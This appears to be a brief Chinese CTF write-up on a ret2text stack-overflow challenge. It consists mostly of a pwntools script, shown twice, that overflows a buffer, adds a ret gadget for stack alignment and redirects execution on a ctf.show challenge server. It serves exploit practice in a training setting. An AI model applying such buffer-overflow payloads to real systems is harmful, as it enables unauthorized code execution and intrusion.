pwn-ret2text(栈平衡)
01栈溢出之ret2text
from pwn import *
r = remote("pwn.challenge.ctf.show", 28107)
payload = b'a'*(0x80+8) + p64(0x4004fe) + p64(0x400637)
r.sendline(payload)
r.interactive()
01栈溢出之ret2text
from pwn import *
r = remote("pwn.challenge.ctf.show", 28107)
payload = b'a'*(0x80+8) + p64(0x4004fe) + p64(0x400637)
r.sendline(payload)
r.interactive()
浙公网安备 33010602011771号